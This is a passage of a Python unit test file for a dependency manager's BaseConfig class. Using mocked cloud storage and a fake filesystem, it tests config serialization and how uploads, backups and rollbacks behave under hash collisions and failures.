'cloud_storage_hash': self.final_dep_hash,
'download_path': '../../relative/dep2/path1'},
'plat2': {
'cloud_storage_hash': 'hash22',
'download_path': '../../relative/dep2/path2'}}}}
self.final_expected_file_lines = [
# pylint: disable=bad-continuation
'{', '"config_type": "BaseConfig",', '"dependencies": {',
'"dep1": {', '"cloud_storage_base_folder": "dependencies_folder",',
'"cloud_storage_bucket": "bucket1",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "hash11",',
'"download_path": "../../relative/dep1/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "%s",' % self.new_dep_hash,
'"download_path": "../../relative/dep1/path2"', '}', '}', '},',
'"dep2": {', '"cloud_storage_bucket": "bucket2",', '"file_info": {',
'"plat1": {', '"cloud_storage_hash": "%s",' % self.final_dep_hash,
'"download_path": "../../relative/dep2/path1"', '},',
'"plat2": {', '"cloud_storage_hash": "hash22",',
'"download_path": "../../relative/dep2/path2"', '}', '}', '}',
'}', '}']
def tearDown(self):
self.tearDownPyfakefs()
# Init is not meant to be overridden, so we should be mocking the
# base_config's json module, even in subclasses.
def testCreateEmptyConfig(self):
expected_file_lines = ['{',
'"config_type": "BaseConfig",',
'"dependencies": {}',
'}']
config = dependency_manager.BaseConfig(self.file_path, writable=True)
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual({}, config._config_data)
self.assertEqual(self.file_path, config._config_path)
def testCreateEmptyConfigError(self):
self.assertRaises(dependency_manager.EmptyConfigError,
dependency_manager.BaseConfig, self.file_path)
def testCloudStorageRemotePath(self):
dependency = 'dep_name'
cs_hash = self.new_dep_hash
cs_base_folder = 'dependency_remote_folder'
expected_remote_path = '%s/%s_%s' % (cs_base_folder, dependency, cs_hash)
remote_path = dependency_manager.BaseConfig._CloudStorageRemotePath(
dependency, cs_hash, cs_base_folder)
self.assertEqual(expected_remote_path, remote_path)
cs_base_folder = 'dependency_remote_folder'
expected_remote_path = '%s_%s' % (dependency, cs_hash)
remote_path = dependency_manager.BaseConfig._CloudStorageRemotePath(
dependency, cs_hash, cs_base_folder)
def testGetEmptyJsonDict(self):
expected_json_dict = {'config_type': 'BaseConfig',
'dependencies': {}}
json_dict = dependency_manager.BaseConfig._GetJsonDict()
self.assertEqual(expected_json_dict, json_dict)
def testGetNonEmptyJsonDict(self):
expected_json_dict = {"config_type": "BaseConfig",
"dependencies": self.dependencies}
json_dict = dependency_manager.BaseConfig._GetJsonDict(self.dependencies)
self.assertEqual(expected_json_dict, json_dict)
def testWriteEmptyConfigToFile(self):
expected_file_lines = ['{', '"config_type": "BaseConfig",',
'"dependencies": {}', '}']
self.assertFalse(os.path.exists(self.file_path))
dependency_manager.BaseConfig._WriteConfigToFile(self.file_path)
self.assertTrue(os.path.exists(self.file_path))
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
def testWriteNonEmptyConfigToFile(self):
self.assertFalse(os.path.exists(self.file_path))
dependency_manager.BaseConfig._WriteConfigToFile(self.file_path,
self.dependencies)
self.assertTrue(os.path.exists(self.file_path))
expected_file_lines = list(self.expected_file_lines)
file_module = fake_filesystem.FakeFileOpen(self.fs)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsNoOp(self, uploader_cs_mock):
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
self.assertFalse(config.ExecuteUpdateJobs())
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(self.dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnInsertNoCSCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = False
uploader_cs_mock.Insert.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = []
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnInsertCSCollisionForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
uploader_cs_mock.Insert.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path),
mock.call(self.new_bucket, self.new_bucket,
self.expected_new_backup_path,
self.new_remote_path)]
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnInsertCSCollisionNoForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
uploader_cs_mock.Insert.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = []
expected_copy_calls = []
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnCopy(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
uploader_cs_mock.Copy.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = []
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path)]
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondInsertNoCSCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = False
uploader_cs_mock.Insert.side_effect = [
True, cloud_storage.CloudStorageError]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path),
mock.call(self.final_bucket,
self.final_remote_path,
self.final_dep_path)]
expected_copy_calls = []
expected_delete_calls = [mock.call(self.new_bucket, self.new_remote_path)]
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondInsertCSCollisionForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
uploader_cs_mock.Insert.side_effect = [
True, cloud_storage.CloudStorageError]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path),
mock.call(self.final_bucket,
self.final_remote_path,
self.final_dep_path)]
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path),
mock.call(self.final_bucket, self.final_bucket,
self.final_remote_path,
self.expected_final_backup_path),
mock.call(self.final_bucket, self.final_bucket,
self.expected_final_backup_path,
self.final_remote_path),
mock.call(self.new_bucket, self.new_bucket,
self.expected_new_backup_path,
self.new_remote_path)]
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondInsertFirstCSCollisionForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.side_effect = [True, False, True]
uploader_cs_mock.Insert.side_effect = [
True, cloud_storage.CloudStorageError]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path),
mock.call(self.final_bucket,
self.final_remote_path,
self.final_dep_path)]
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path),
mock.call(self.new_bucket, self.new_bucket,
self.expected_new_backup_path,
self.new_remote_path)]
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnFirstCSCollisionNoForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.side_effect = [True, False, True]
uploader_cs_mock.Insert.side_effect = [
True, cloud_storage.CloudStorageError]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = []
expected_copy_calls = []
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondCopyCSCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
uploader_cs_mock.Insert.return_value = True
uploader_cs_mock.Copy.side_effect = [
True, cloud_storage.CloudStorageError, True]
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path),
mock.call(self.final_bucket, self.final_bucket,
self.final_remote_path,
self.expected_final_backup_path),
mock.call(self.new_bucket, self.new_bucket,
self.expected_new_backup_path,
self.new_remote_path)]
expected_delete_calls = []
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondCopyNoCSCollisionForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.side_effect = [False, True, False]
uploader_cs_mock.Copy.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = [mock.call(self.final_bucket, self.final_bucket,
self.final_remote_path,
self.expected_final_backup_path)]
expected_delete_calls = [mock.call(self.new_bucket, self.new_remote_path)]
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs, force=True)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsFailureOnSecondCopyNoCSCollisionNoForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.side_effect = [False, True, False]
uploader_cs_mock.Copy.side_effect = cloud_storage.CloudStorageError
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload,
self.final_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path),
mock.call(self.final_bucket,
self.final_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = []
expected_delete_calls = [mock.call(self.new_bucket, self.new_remote_path)]
self.assertRaises(cloud_storage.CloudStorageError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertEqual(2, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
self.assertEqual(self.final_pending_upload, config._pending_uploads[1])
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsSuccessOnePendingDepNoCloudStorageCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = False
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._IsDirty())
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = []
expected_delete_calls = []
self.assertTrue(config.ExecuteUpdateJobs())
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.new_expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
self.assertEqual(expected_delete_calls,
uploader_cs_mock.Delete.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsSuccessOnePendingDepCloudStorageCollision(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._IsDirty())
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = [mock.call(self.new_bucket, self.new_remote_path,
self.new_dep_path)]
expected_copy_calls = [mock.call(self.new_bucket, self.new_bucket,
self.new_remote_path,
self.expected_new_backup_path)]
self.assertTrue(config.ExecuteUpdateJobs(force=True))
self.assertFalse(config._IsDirty())
self.assertFalse(config._pending_uploads)
self.assertEqual(self.new_dependencies, config._config_data)
file_module = fake_filesystem.FakeFileOpen(self.fs)
expected_file_lines = list(self.new_expected_file_lines)
for line in file_module(self.file_path):
self.assertEqual(expected_file_lines.pop(0), line.strip())
self.fs.CloseOpenFile(file_module(self.file_path))
self.assertFalse(config._pending_uploads)
self.assertEqual(expected_insert_calls,
uploader_cs_mock.Insert.call_args_list)
self.assertEqual(expected_exists_calls,
uploader_cs_mock.Exists.call_args_list)
self.assertEqual(expected_copy_calls,
uploader_cs_mock.Copy.call_args_list)
@mock.patch('dependency_manager.uploader.cloud_storage')
def testExecuteUpdateJobsErrorOnePendingDepCloudStorageCollisionNoForce(
self, uploader_cs_mock):
uploader_cs_mock.Exists.return_value = True
self.fs.CreateFile(self.file_path,
contents='\n'.join(self.expected_file_lines))
config = dependency_manager.BaseConfig(self.file_path, writable=True)
config._config_data = self.new_dependencies.copy()
config._is_dirty = True
config._pending_uploads = [self.new_pending_upload]
self.assertEqual(self.new_dependencies, config._config_data)
self.assertTrue(config._is_dirty)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
expected_exists_calls = [mock.call(self.new_bucket, self.new_remote_path)]
expected_insert_calls = []
expected_copy_calls = []
self.assertRaises(dependency_manager.CloudStorageUploadConflictError,
config.ExecuteUpdateJobs)
self.assertTrue(config._is_dirty)
self.assertTrue(config._pending_uploads)
self.assertEqual(self.new_dependencies, config._config_data)
self.assertEqual(1, len(config._pending_uploads))
self.assertEqual(self.new_pending_upload, config._pending_uploads[0])
file_module = fake_filesystem.FakeFileOpen(self.fs)
